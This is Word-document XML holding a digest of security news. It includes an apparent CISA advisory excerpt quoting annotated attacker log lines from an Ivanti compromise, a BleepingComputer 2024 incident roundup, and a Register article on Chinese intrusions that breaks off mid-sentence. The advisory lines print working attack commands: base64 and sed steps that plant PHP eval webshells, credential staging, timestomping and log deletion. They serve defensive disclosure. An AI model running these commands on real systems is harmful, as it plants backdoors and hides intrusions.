        <w:t xml:space="preserve">sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 &gt;/opt/landesk/broker/webroot/gsb/site.cnf Exfiltrates credentials and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>places them in a site.cnf webfile.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d &gt;/opt/landesk/broker/webroot/gsb/view.php Creates a webshell at view.php.</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sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire --update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq</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FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm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9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash; Creates a webshell at help.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setPhpTimeZone($TIMEZONE)/\/\/ setPhpTimeZone()/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setSystemTimeZone( $TIMEZONE )/\/\/ setSystemTimeZone( $TIMEZONE )/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/GSB main page/GSB main page\neval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"])\;/g' /opt/landesk/broker/webroot/client/index.php Adds a webshell into index.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/$canvas_height = 600;/$canvas_height = 600;\n\teval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/' /opt/landesk/broker/webroot/gsb/style.php Adds a webshell into style.php. sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php Timestomping attempt to change the access and modification of time of index.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php Timestomping attempt to change the access and modification time of style.php sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php Timestomping attempt to change the access and modification time of DateTimeTab.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php Timestomping attempt to change the access and modification time of help.php sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages Removes evidence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf Removes site.cnf file (exfiltrated credentials).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php Removes one of the original webshells.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sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm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/opt/landesk/broker/webroot/gsb/view.php Removes one of the original webshells.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.01.22 20:50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The biggest cybersecurity and cyberattack stories of 2024</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Lawrence Abrams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January 1, 2025 11:03 AM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2024 was a big year for cybersecurity, with significant cyberattacks, data breaches, new threat groups emerging, and, of course, zero-day vulnerabilities.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stories, though, were more impactful or popular with our 31 million readers than others.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Below are fourteen of what BleepingComputer believes are the most impactful cybersecurity stories of 2024, with a summary of each. These stories are in no particular order. 14. Internet Archive hacked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 October 9, the Internet Archive was hit by two different attacks at once- a data breach where the site's user data for 33 million users was stolen and a DDoS attack by an alleged pro-Palestinian group named SN_BlackMeta.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both attacks occurred over the same period, they were conducted by different threat actors.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threat actors who breached Internet Archive told BleepingComputer that they could do so through an exposed GitLab configuration file containing an authentication token, allowing them to download the Internet Archive source code.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source code contained additional credentials and authentication tokens, including the credentials to Internet Archive's database management system. This allowed the threat actor to download the organization's user database, further source code, and modify the site. 13. Bad CrowdStrike updates crashed 8.5 million Wndows devices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 July 19th, 2024, a faulty CrowdStrike Falcon update was pushed out to Windows PCs in the early morning, causing the cybersecurity software's kernel driver to crash the operating system.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bug caused significant global disruptions, impacting approximately 8.5 million Windows systems, who now found that their devices had crashed with no easy way back into the operating system to remove the faulty update other than booting into safe mode.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bug stemmed from a flaw in CrowdStrike's content validation process, which failed to detect a defective update. This faulty update triggered a series of system crashes, including endless reboot loops that affected both Windows devices and Windows 365 Cloud PCs.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 CrowdStrike is used by many organizations, it quickly caused widespread disruption, impacting financial firms, airlines, and hospitals worldwide who suddenly found their Windows devices and applications were unavailable.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Microsoft released a Windows repair tool to help remove the problematic CrowdStrike driver and restore affected systems. Despite this tool, many organizations faced a lengthy recovery process as each device would need to be manually fixed.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Things got worse when the threat actors started getting into the game.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Cybercriminals distributed fake CrowdStrike repair tools and manuals that pushed malware, including the new Daolpu infostealer. These phishing campaigns targeted orgs attempting to recover from the outage, further delaying outages.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Investors soon filed a lawsuit against CrowdStrike, accusing it of negligence in its quality assurance processes and failing to prevent the release of the defective update.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Microsoft also announced that they would be looking into changing their kernel driver handling policies in response to the incident and encouraged antivirus vendors to limit their use of Kernel drivers to prevent these types of crashes. 12. Kaspersky banned in the US-software automatically replaced with UltraAV</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June, the Biden administration announced an upcoming ban of Kaspersky antivirus software, giving customers until September 29, 2024, to find alternative security software.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ban not only involved the sale of Kaspersky software in the US, but also prevented the company from delivering antivirus and security updates to customers.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month later, Kaspersky began shutting down its operations in the US, telling BleepingComputer that the Biden administration's decisions have made operations "no longer viable."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Kaspersky decided to sell its US customer base to Pango and emailed customers in early September that they would receive a free upgrade to the UltraAV software.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the company didn't make it clear to customers that it would uninstall its software, and on September 19, Kaspersky users suddenly found their Kaspersky products removed and UltraAV force-installed on their computers whether they wanted it or not.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made many Kaspersky customers furious that software was installed on their devices without permission or clear notification that it would happen. 11. Russian state-sponsored hackers breached Microsoft's corporate email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January, Microsoft disclosed that Russian state-sponsored threat actors breached their corporate email servers in November 2023 to steal email from their leadership, cybersecurity, and legal teams.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of these emails contained information about the hacking group itself, allowing the threat actors to learn what Microsoft knew about them.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hacking group, known as Midnight Blizzard (aka Nobelium, or APT29) is believed to be a state-backed cyberespionage group tied to the Russian Foreign Intelligence Service (SVR).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Microsoft later disclosed that the threat actors conducted a password-spray attack that allowed access to a legacy non-production test tenant account.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test tenant account also had access to an OAuth application with elevated privileges in Microsoft's corporate environment, allowing the hackers to steal data from corporate mailboxes.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hackers breached Microsoft again in March 2024 using information found in the stolen emails, allowing them to steal source code repositories.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kept getting worse, with CISA confirming in April that emails between US federal agencies and Microsoft were also stolen in the attack. These emails contained information that let the hackers gain access to some customer's systems. 10. National Public data breach exposed your Social Security Number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August, almost 2.7 billion records of personal information for people in the United States were leaked on a hacking forum, exposing names, social security numbers, all known physical addresses, and possible aliases.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The data was stolen from National Public Data, a company that collects and sells access to personal data for use in background checks, to obtain criminal records, and for private investigators.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Have I Been Pwned's Troy Hunt analyzed the breach and determined it contained 134 million unique email addresses, making this a monstrous data breach.</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threat actors behind the breach attempted to sell it for $3.5 million, but it was eventually leaked for free on a hacking forum. 9. Attacks on edge networking devices run rampant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year, we continued to see attacks targeting edge networking devices from various manufacturers, including Fortinet, TP-Link, Ivanti, and Cisco.</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These types of devices are valuable targets as they are meant to be exposed to the Internet, and once breached, allow threat actors to pivot into the internal network.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are too many stories to summarize, so here are a list of the interesting ones: Chinese hackers breached 20,000 FortiGate systems worldwide CISA cautions against using hacked Ivanti VPN gateways even after factory resets The Pacific Rim attacks: US sanctions Chinese firm for hacking firewalls in ransomware attacks Chinese hackers use Quad7 botnet to steal credentials Cisco warns of NX-OS zero-day exploitation to deploy custom malware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has gotten so bad that the US is considering banning China-made TP-Link routers over cybersecurity concerns. 8. CDK Global ransomware attacks takes down the car dealership industry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Car dealership software-as-a-service provider CDK Global suffered a Black Suit ransomware attack, causing the company to shut down its systems and leaving clients unable to operate their business normally.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CDK Global provides clients in the auto industry with a SaaS platform that handles all aspects of a car dealership's operation, including CRM, financing, payroll, support and service, inventory, and back-office operations.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 many of the car dealerships in the US utilize the platform, the outage led to widespread disruption, preventing dealers from tracking and ordering car parts, conducting new sales, and offering financing. 7. The SnowFlake data theft attacks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May, threat actors began selling data that they claimed was stolen from customers of the Snowflake cloud data platform.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the attacks were investigated, it was determined that the threat actors didn't breach Snowflake but rather used compromised credentials to log in to customer's SnowFlake accounts.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These credentials are believed to have been stolen through information- stealing malware.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Once they logged into the account, they were able to export the databases and use them to extort companies into paying a ransom for the data not to be publicly released.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AT&amp;T disclosed in July that call logs of 109 million customers were exposed during the incident and that the data was accessed from an online database on the company's Snowflake account.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TicketMaster was also impacted, with the threat actors claiming to steal the data of 560 million customers.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Data breaches linked to these attacks, which started in April 2024, have affected hundreds of millions of individuals using the services of AT&amp;T, Ticketmaster, Santander, Pure Storage, Advance Auto Parts, Los Angeles Unified, QuoteWizard/LendingTree, and Neiman Marcus.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November, the US Department of Justice unsealed an indictment against two people, Connor Riley Moucka and John Erin Binns, who are accused of being behind the attacks.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threat actors allegedly extorted $2.5 million as part of these attacks, with Wired reporting that AT&amp;T paid $370,000 for the hackers to delete stolen call records. 6. The North Korean IT Worker scheme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year, we saw an uptick in North Korean IT workers trying to get jobs in the US and other countries to perform cyberespionage and generate revenue for their country's operations.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May, the Department of Justice charged five individuals, a US Citizen woman, a Ukrainian man, and three foreign nationals, for their involvement in helping North Korean IT works infiltrate US job markets to generate revenue for North Korea's nuclear weapons program.</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July, email security firm KnowBe4 mistakenly hired a North Korean hacker as their Principal Software Engineer, who attempted to install information- stealing malware on the network.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August, the Justice Department arrested a Nashville man charged with helping North Korean IT workers obtain remote work at companies across the United States and operating a laptop farm they used to pose as U.S.-based individuals.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Both Mandiant and SecureWorks later released reports on the North Korean IT Worker threat, sharing their tactics and how companies can protect themselves. 5. The UnitedHealth Change HealthCare ransomware attack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February, UnitedHealth subsidiary Change Healthcare suffered a massive ransomware attack that caused massive disruption to the US healthcare industry.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outages prevented doctors and pharmacies from filing claims and prevented pharmacies from accepting discount prescription cards, causing patients to pay full price for medications.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attack was ultimately linked to the BlackCat ransomware gang, aka ALPHV, who used stolen credentials to breach the company's Citrix remote access service, which did not have multi-factor authentication enabled.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During the attack, the threat actors stole 6 TB of data and ultimately encrypted computers on the network, causing the company to shut down IT systems to prevent the spread of the attack.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The UnitedHealth Group admitted to paying a ransom demand to receive a decryptor and for the threat actors to delete the stolen data. The ransom payment was allegedly $22 million, according to the BlackCat ransomware affiliate who conducted the attack.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BlackCat ransomware operation was under immense pressure from law enforcement after the Change Healthcare attacks, causing them to shut down.</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UnitedHealth paid an alleged $20 million ransom, the ransomware operation performed an exit scam, stealing all of the money and not sharing any with the affiliate who conducted the attack.</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Unfortunately, the affiliate claimed to still have Change Healthcare's data, which they used to extort the healthcare company again, this time using RansomHub's extortion site.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Ultimately, the data disappeared from the extortion, likely indicating that another ransom was paid.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October, UnitedHealth confirmed that over 100 million people had their personal and healthcare data stolen, marking this as the largest healthcare data breach in recent years. 4. LockBit disrupted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 February 19, authorities took down LockBit's infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel.</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disruption was part of an international law enforcement operation called Operation Cronos.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Five days later, LockBit relaunched with new infrastructure and threatened to focus more of its attacks on the government sector.</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the ransomware gang was never able to return to its previous prominence, with its affiliates moving to other ransomware operations.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Over the past year, law enforcement has continued to target LockBit, identifying and charging seven LockBit ransomware members.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Among those charged, is the primary operator of the ransomware operation, who the Department of Justice claims is a Russian national named Dmitry Yuryevich Khoroshev, aka 'LockBitSupp' and 'putinkrab'.</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LockBit recently began testing a new encryptor called LockBit 4, which does not appear to be much different than its previous version. 3. Windows 11 Recall: A privacy nightmare?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Microsoft's new AI-powered Windows 11 Recall feature has sparked a lot of concern among the cybersecurity community, with many thinking that it is a massive privacy risk and a new attack vector that threat actors can exploit to steal data.</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receiving tremendous backlash, Microsoft delayed the release of the software to increase its security by requiring users to opt-in to enable Recall on their computers and that they'll have to confirm they're in front of their PC via Windows Hello to be able to use it.</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Microsoft continued to delay its release while adding additional features, such as automatically filtering sensitive content, allowing users to exclude specific apps, websites, or in-private browsing sessions, and it can be removed if needed.</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after releasing the software to Windows Insiders for testing, it was discovered that Windows 11 Recall did not properly filter sensitive information, like credit cards.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Microsoft said they continue refining the product as new issues are discovered. 2. The 2024 Telecom attacks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Chinese state-sponsored hacking group known as "Salt Typhoon" is linked to a series of cyberattacks targeting telecommunications firms globally.</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These breaches compromised at least nine major telecom providers, including AT&amp;T, Verizon, and T-Mobile.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group reportedly focused on infiltrating telecom infrastructure to steal text messages, phone call information, and voicemails from targeted people. The threat actors also targeted the wiretapping platforms used by the US government, raising serious national security concerns.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White House briefing revealed that Salt Typhoon's operations also impacted telecommunications providers in dozens of countries.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US, these attacks prompted concerns about weaknesses in telecom infrastructure and the security of government surveillance platforms.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 lawmakers, including Senator Ron Wyden, have proposed legislation to address vulnerabilities in the nation's telecom infrastructure. The proposed bill aims to establish stricter cybersecurity standards and oversight for telecom providers to prevent similar attacks in the future.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government reportedly plans to ban China Telecom's last active US operations in response to the telecom hacks. 1. The rise of Infostealers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Information-stealing malware campaigns are running rampant this year, used in many different campaigns to steal infected users' browser information, cookies, saved credentials, credit cards, and cryptocurrency wallets.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infostealers have been around for many years, they have been particularly prominent with threat actors using them in a wide range of campaigns.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These stolen credentials are then used to breach corporate networks, bank accounts, cryptocurrency exchanges, and email accounts.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The number of stories surrounding infostealers is too long to summarize, so instead, here are a few of the ways infostealers were used this year: Hacker hijacks Orange Spain RIPE account to cause BGP havoc Global infostealer malware operation targets crypto users, gamers Windows vulnerability abused braille "spaces" in zero-day attacks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Malicious ads push Lumma infostealer via fake CAPTCHA pages Clever 'GitHub Scanner' campaign abusing repos to push malware Cybercriminals pose as "helpful" Stack Overflow users to push malware</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Unfortunately, for those who become infected with an infostealer, it can lead to devastating financial losses as threat actors steal cryptocurrency and access victims' bank accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">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best way to prevent these types of attacks is to enable two-factor authentication with an authenticator app on all accounts that offer the protection. With 2FA enabled, even if a threat actor has your credentials, they won't be able to log in without the code generated by your authenticator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00EB1B73" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2025.01.01 19:20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2024/</w:t>
      </w:r>
      <w:r w:rsidR="00093949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>China's cyber intrusions took a sinister turn in 2024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From targeted espionage to pre-positioning - not that they are mutually exclusive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Jessica Lyons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Tue 31 Dec 2024 // 12:15 UTC</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Chinese government's intrusions into America's telecommunications and other critical infrastructure networks this year appears to signal a shift from cyberspying as usual to prepping for destructive attacks.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FBI and other US federal agencies rang in 2024 boasting about disrupting a Chinese botnet composed of "hundreds" of outdated routers intent on breaking into US critical infrastructure facilities. Spoiler alert: the botnet is back.</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same government-backed crew also compromised at least one large US city's emergency services network, and has been conducting reconnaissance and enumeration of "multiple" American electric companies since early 2023.</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Soon after these intrusions came to light, the Feds began issuing very public alerts that Volt Typhoon was preparing to "wreak havoc" on American infrastructure and "cause societal chaos" in the US.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Typhoon's choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the US authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions," the government agencies warned.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public learned later in the year that another Beijing hacking unit, this one called Salt Typhoon, had broken into American telecommunications networks in what one senior US senator called the "worst telecom hack in our nation's history - by far."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government and infosec sources, the attacks remain ongoing.</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 cannot say with certainty that the adversary has been evicted, because we still don't know the scope of what they're doing," Jeff Greene, CISA's executive assistant director for cybersecurity, told reporters during a Salt Typhoon briefing in early December. 'Every org should be put on notice'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"Every organization should look at this as being put on notice that there are hostile nation state entities," CrowdStrike Senior VP of Counter Adversary Operations Adam Meyers told The Register. "If you are involved in any degree of business that ties into the broader international ecosystem, or you're providing services that are of logistical importance for critical infrastructure, you're in the line of fire."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CrowdStrike tracks 63 different China-linked groups, and about two dozen of these are currently active, according to Meyers. In November, Meyers testified before a Senate committee on how the cyberthreats from the Middle Kingdom have evolved over the past two decades.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Prior to 2015, these tended to be "smash-and-grab" raids, he said, noting that over the years, they have become more targeted intrusions that focus on high-value individuals and information: sources of political and military secrets, and intellectual property that can advance China's national interests.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Even more worrisome is that at least one of these state-sponsored groups, Volt Typhoon, which CrowdStrike tracks as "Vanguard Panda," appears to be pre-positioning deep inside American critical infrastructure networks so it's ready for disruptive or destructive attacks preceding or coinciding with military activities.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reason that Vanguard Panda attracted so much attention was that it was the first time that there was a demonstrable aspect of pre-positioning," Meyers said during an interview. "This would be like if the Russians, back in the '60s, thought they were going to invade the United States. Their pre- positioning would be to hide caches of weapons and resources that they could access as they mounted their invasion across the US."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would be like if the Russians, back in the '60s, were going to invade. Their pre-positioning would be to hide caches of weapons they could access as they mounted their invasion across the US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Plus, it's unlikely that blowing up the botnet earlier this year did anything to disrupt the larger organization, or its future plans, he added.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"Disrupting that did not impact Vanguard Panda," Meyers said. "It did not impact their ability to access the targets that they had gained access to and were continuing to maintain persistence."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He said he's doubtful that Volt Typhoon/Vanguard Panda was even running the botnet infrastructure. "That was likely another group that was tasked with providing communications infrastructure, and when that got disrupted, you would have to expect that there would have been a secondary path that would have been on standby," Meyers noted. "They're not going to just leave things to chance. If there's a primary mechanism that they're using, then they want a secondary and a tertiary one."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Before implanting the KV botnet malware on routers and other devices, Volt Typhoon has to break in, which usually involved exploiting bugs in firewalls, VPN appliances, and web servers, or abusing misconfigurations or weak - sometimes non-existent - passwords in these products. Volt Typhoon's post-exploitation activity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Tenable last month published a list of some of the CVEs that the crew has exploited in the past to gain initial access. These include a vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software that allows a remote, unauthenticated attacker to upload a file to any location on the filesystem (CVE-2021-27860), a critical authentication bypass flaw in Zoho ManageEngine ADSelfService Plus (CVE-2021-40539), two critical heap-based buffer overflow bugs in Fortinet FortiOS and FortiProxy (CVE-2022-42475 and CVE-2023-27997) and a file upload flaw in Versa Director SD-WAN (CVE-2024-39717).</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Lumen Technologies' Black Lotus Labs in August warned that Volt Typhoon was abusing the Versa vulnerability CVE-2024-39717 to plant custom, credential- harvesting web shells on customers' networks and noted that these attacks are "likely ongoing" against unpatched systems.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"What's unique about Volt Typhoon is the post-exploitation activity," Tenable research engineer Scott Caveza told The Register. It doesn't use custom malware, which can be more easily spotted by antivirus software, but instead uses legitimate software products and credentials to snoop around and avoid detection.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These include Windows tools (cmd.exe, netsh, and PowerShell) for command execution and lateral movement, Mimikatz to extract credentials from memory, Remote Desktop Protocol (RDP) to burrow deeper into internal systems, and Windows Task Scheduler to establish scheduled tasks for regular, persistent access.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"Just executing normal commands and binaries that would be found on a Windows system to do reconnaissance, and further their way through the network," Caveza said. "It's very stealth activity, and really speaks to the skill this group has at evading security software suites and making the traffic look seemingly normal."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addition to Volt Typhoon and some of the other Chinese government groups using stealthy, so-called "living-off-the-land" techniques, another noteworthy aspect of their ongoing operations targeting critical industries is the US government's very loud response to the attacks. Caught in the cookie jar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Not only did the FBI, CISA, and other government agencies sound the alarm on the Chinese intruders, but they also published a threat hunting guide and listed actions to mitigate Volt Typhoon activity, including patching internet-facing systems, using phishing-resistant multi-factor authentication, and ditching outdated gear that is no longer supported by the manufacturer.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"Number one, kudos to our government," ZeroFox VP of Intelligence Adam Darrah told The Register. "I do applaud the United States government for being more bold in publicizing these campaigns and saying here's how to prevent this being an issue. It's a way to crowdsource national defense."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every major intelligence agency in the world spies on adversarial - and sometimes even friendly - government, China's cyberoperations this year should be a "wake-up call" to people, Darrah added.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"China has historically been very careful and good about not getting publicly caught with their hand in the American military cookie jar," he said. "So what was interesting to me: Number one they got caught. Number two: it was publicized. And number three: I'm happy to see this, because it's time to stop pretending China is this peaceful country that only wants to steal our IP for economic and trade reasons. That's not true."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Rafe Pilling, director of threat intelligence for the Secureworks counter threat unit, also highlighted the US government's efforts to encourage people to mitigate the threat posed by Volt Typhoon. And now only "the threat that has been posed today" with the targeted reconnaissance and espionage activities, "but perhaps more about the threat posed in the future - the wider, unknown activity that might be out there."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includes the pre-positioning warnings and readying for future attacks."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Piling's team covers the gamut of threat groups, from financially motivated cybercrime organizations to nation-state attackers, and China "consistently tops our list of state sponsored actors," he told The Register.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first cases that Securworks now attributes to Volt Typhoon (it tracks this crew as Bronze Silhouette) occurred in June and September 2021.</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But at the time, "we had a number of incidents we responded to for customers involving that threat group that we just had a question mark over," Piling said. "They didn't fall into any of the other buckets we tracked, so we out a question mark, 'China?' over those incidents."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was only years later, after information sharing efforts with public and private researchers, "that you see there is this wider set of activities targeting organizations in mainland United States all the way out to telcos in Guam," he added.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But even back in 2021, "the activity we saw certainly looked like access- type operations," Piling said. "Once you get past the access stage, you can achieve a number of intents, everything from espionage to pre-positioning for disruptive operations. And they're not mutually exclusive."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security and incident response firms get called in after an attack has occurred, the defenders on the front lines are those working in the water, electric grid, oil and gas, and other critical sectors. Front-line defenders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These are among operational technology 